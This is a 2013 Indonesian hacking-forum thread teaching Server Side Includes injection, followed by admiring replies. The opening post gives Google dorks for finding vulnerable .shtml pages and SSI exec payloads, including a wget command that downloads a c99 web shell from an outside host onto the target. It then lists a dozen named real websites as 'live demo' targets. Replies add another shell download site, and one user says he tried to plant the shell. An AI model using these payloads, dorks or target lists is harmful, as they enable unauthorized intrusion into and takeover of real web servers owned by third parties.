Server Side Includes Injection
#1
SSI Injection (Server-side Include) adalah tehnik exploit server side yang mengizinkan attacker untuk mengirim perintah yang nanti nya akan di eksekusi oleh web server

SSI Injection memanfaatkan kegagalan aplikasi web untuk membersihkan data yang disediakan pengguna sebelum mereka dimasukkan ke dalam server-side ditafsirkan file HTML

Sever Side Includes Termasuk serangan memungkinkan eksploitasi aplikasi web dengan menginjeksi skrip dalam halaman HTML atau mengeksekusi kode arbitrary codes remotely.

Kalau di Php untuk memulai dan menutup kita gunakan <? dan ?>
kalau SSI <!-- -->

Include PHP
Code:
<? include "file.html"; ?>
Include SSI
Code:
<!--  #include virtual="file.html"  -->

SSI untuk mengeskekusi perintah CLI
Code:
<!-- #exec cmd="ls -A" -->

CGI
Code:
<!-- #exec cmd="ls -A" -->
<!--#exec cgi="/cgi-bin/any_script.cgi" -->

biasanya halaman yang menggunakan SSI itu berformat
.shtml / .shtm / .stm

Sudah perkenalan dengan ssi mari kita melakukan exploitasi ..
Kita bisa gunakan
[spoiler for="Dork"]
inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurlConfusedearch.shtml
inurlConfusedearch.shtm
inurlConfusedearch.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
[/spoiler]

[Image: Fw7qE.png]

<!--#echo var="HTTP_USER_AGENT" -->
[Image: 8oms4.png]

<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->
[Image: VDc9n.png]

sitetarget.com/shell.php Big Grin
[Image: 4a7bR.png]

anda bisa coba di sini ... walau sih di situ udah di fix .. tapi beberapa perintah masih bisa Smile
[spoiler for="live demo"]
http://www.cgibackgrounds.com/bin/Cklb
http://www.stockshop.com/bin/Cklb
http://www.fogstock.com/bin/Cklb
http://www.glasshouseimages.com/user/login.shtml
http://www.wppionlinecontest.com/user/login.shtml
www.cgibackgrounds.com/user/login.shtml
www.getstock.com/user/login.shtml
www.estostock.com/user/login.shtml
http://www.blendimages.com/user/login.shtml
http://www.pdnthelook.com/user/login.shtml
http://iloveimages.com/user/login.shtml
http://www.win-initiative.com/user/login.shtml (view source to see output)
http://thegatheringsphotocontest.com/user/login.shtml
[/spoiler]


Sumber :
https://www.owasp.org/index.php/Testing_...SP-DV-009)

penjelasannya agak berantakan ya Smile soalnya dari bahasa ingriss ane translate manual :v .... jika berkenaan bisa leparin ane cendol ....

#2
wew keren, ini yang di tunjukkan malam tadi yah ke saya
+1 dulu ahh
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#3
\m/ keren bro, trus di share ilmu2 barunya lgi
send +1

#4
(04-28-2013, 12:31 PM)wine trochanter Wrote: wew keren, ini yang di tunjukkan malam tadi yah ke saya
+1 dulu ahh

makasih om reputasinya Big Grin Big Grin
kalau yang maelm tadi lewat cpanel :v

(04-28-2013, 12:34 PM)Bet0 Wrote: \m/ keren bro, trus di share ilmu2 barunya lgi
send +1

iya om termakasih dah comment juga Big Grin :d

#5
thk om. # shellnya http://www.c99shell.gen.tr/

#6
makasih om tutornya keren

#7
Wah wah wah Keren nih Lansung praktekin dari pada galau Ilmu baru lagi makasi Bto
+1 Buat lu Big Grin
alpoah@IBTeam:~#


Power Off BODOH

#8
pas ane mau tanem shellnya, malah redirect ke sini http://nsa.gov/?I+AM+A+HACKER+AND+I+WAS+...ME+FIND+ME wkwkw parah :v

#9
(04-28-2013, 01:40 PM)Andy182 Wrote: pas ane mau tanem shellnya, malah redirect ke sini /?I+AM+A+HACKER+AND+I+WAS+TRYING+TO+BREAK+INTO+A+SITE+WITH+SSI+INJECTION+EXEC+CMD+TYPE+ATTACK+AND+SO+THEY+SENT+ME+HERE.+PLEASE+COME+FIND+ME wkwkw parah :v

iya :v itu yang udah di patch sama admin nya ...

(04-28-2013, 01:40 PM)Andy182 Wrote: pas ane mau tanem shellnya, malah redirect ke sini /?I+AM+A+HACKER+AND+I+WAS+TRYING+TO+BREAK+INTO+A+SITE+WITH+SSI+INJECTION+EXEC+CMD+TYPE+ATTACK+AND+SO+THEY+SENT+ME+HERE.+PLEASE+COME+FIND+ME wkwkw parah :v

iya :v itu yang udah di patch sama admin nya ...

#10
Wew keren. Berarti ky xss yah bro? Tapi bs eksekusi cmd servernya.






Users browsing this thread: 1 Guest(s)